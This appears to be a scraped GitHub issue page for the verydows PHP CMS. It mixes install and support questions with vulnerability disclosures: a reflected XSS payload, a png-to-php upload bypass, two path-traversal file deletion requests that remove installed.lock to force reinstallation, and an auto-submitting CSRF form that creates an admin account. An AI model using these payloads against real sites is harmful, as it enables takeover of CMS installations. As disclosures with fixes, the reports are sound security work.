verytops / verydows Goto Github PK

Environment installed from verydows-master

In page localhost/index.php?c=main&a=index, the Get function can change the function used in PHP, the user/attacker can modify the parament and add the script which will be shown without filtering. They can use the script to steal the cookie or some things worse

Payload used: <script>alert(document.cookie)</script>
Affected URL: http://localhost/index.php?c=main&a=index%3Cscript%3Ealert(document.cookie)%3C/script%3E

Navigate to the Affected URL, Payload would be triggered.

Payload used - <script>alert(document.cookie);</script>

• Navigate to the Affected URL, Payload would be triggered.
  

为何管理员和用户的信息分开记录，不合并一起？ 合并一起登录应该更方便。

WARNING: require(C:\xampp0\htdocs\vdows\vendor/autoload.php): failed to open stream: No such file or directory in C:\xampp0\htdocs\vdows\protected\include\core.php on line 18.

could someone help me get this installed?

Upload a png file in the background file management office, you can rename it to a php file

Vulnerability pic

Vulnerability file: \protected\controller\backend\file_controller.php
It can be seen that the deleted file or directory is received through the path parameter, and is directly deleted without security filtering, so we can use this vulnerability to delete any file

Vulnerability to reproduce:

1. First log in to the background to get cookies。
2. Here I delete the installed.lock file to verify the existence of the vulnerability，construct the packet as follows:

POST /index.php?m=backend&c=file&a=delete HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.xiaodi.com/index.php?m=backend&c=file&a=index
Cookie: VDSSKEY=d6123bedd1b697a783c9da6f0b92254c
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

path[]=../install/installed.lock

3、Click Send Packet,you can see that the file was deleted successfully

4、It can be seen that when the installed.lock file exists, when visiting http://x.x.x/install, the page will directly jump to the front home page

Therefore, when we delete the installed.lock file and visit http://x.x.x/install again, we will come to the installation wizard page

Repair suggestion:

1. Filter ../ or ..\ in the file variable
2. Limit the scope of deleted files or directories

Warning: file_put_contents(/www/wwwroot/aisuyuki.xyz/protected/config.php): failed to open stream: Permission denied in /www/wwwroot/aisuyuki.xyz/install/resources/function.php on line 195

Warning: file_put_contents(/www/wwwroot/aisuyuki.xyz/protected/cache/setting.php): failed to open stream: Permission denied in /www/wwwroot/aisuyuki.xyz/install/resources/function.php on line 204

比如：LOGO之类的

后台设置数据缓存周期为0时，页面还是取的缓存数据。
跟描述不一致：“前台控制器中使用数据缓存的更新周期(秒)，设置为"0"则表示不使用缓存”。

后台右上角的"设置"按钮覆盖整个后台页面. 每次需要点击后退回到后台.

A CSRF vulnerability was found in this cms.
Logged-in administrator user may add another administrator account by clicking following POC

<form action="http://thewind/verydows/index.php?m=backend&c=admin&a=add&step=submit" id="test" method="post">
<!--Change the url when testing!-->
<input type=text name="username" value="TomAPU" />
<input type=text name="password" value="123456" />
<input type=text name="resetpwd" value="1" />
<input type=text name="repassword" value="123456" />
<input type=text name="name" value="TomAPU" />
<input type=text name="email" value="[email protected]" />
</form>
<script>
var f=document.getElementById("test");
f.submit();
</script>

In page /verydows/index.php?m=api&c=stats&a=count where users' visiting are logged, we can modify the POST parameter "referrer" which will be shown without filtering to administrator.
As a result, hacker can construct a XSS payload to steal admin's cookies!
payload:

result:

请问微信端怎样设置

There is a CSRF vulnerability that allows information and other operations to be changed
http://dcbang.net/QQ.PNG

POC:
`

首页及后台都提示同样问题

Vulnerable file: \protected\controller\backend\database_controller.php
It can be clearly seen that $file is not security filtered
Vulnerable code：
....................................................

..................................................

Vulnerability to reproduce:
1、First log in to the background to get the cookie

2、Here I delete the installed.lock file to verify the existence of the vulnerability, the construction package is as follows:

POST /index.php?m=backend&c=database&a=restore&step=delete HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.xiaodi.com/index.php?m=backend&c=database&a=restore
Cookie: VDSSKEY=d6123bedd1b697a783c9da6f0b92254c
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

file%5B%5D=../../../install/installed.lock

3、Click to send the data package, you can see that the file was deleted successfully

4、It can be seen that when the installed.lock file exists, when visiting http://xxx/install, the page will directly jump to the front home page

So as long as we delete the installed.lock file, we can reinstall the system，When we delete the installed.lock file and visit http://x.x.x/install, we will enter the installation wizard page

Repair suggestion:

1、Filter ../ or ..\ in the file variable
2、Limit the scope of deleted files or directories

public/theme/frontend/default/js/general.js ： $.fn.vdsConfirm 方法里面的209行，多次调用的话，对button重复绑定事件，以致最后确定的时候触发了N个事件。
解决方法：
应在208行追加一行：
$confirm.find('button').unbind('click');

这个.htaccess 貌似无法过滤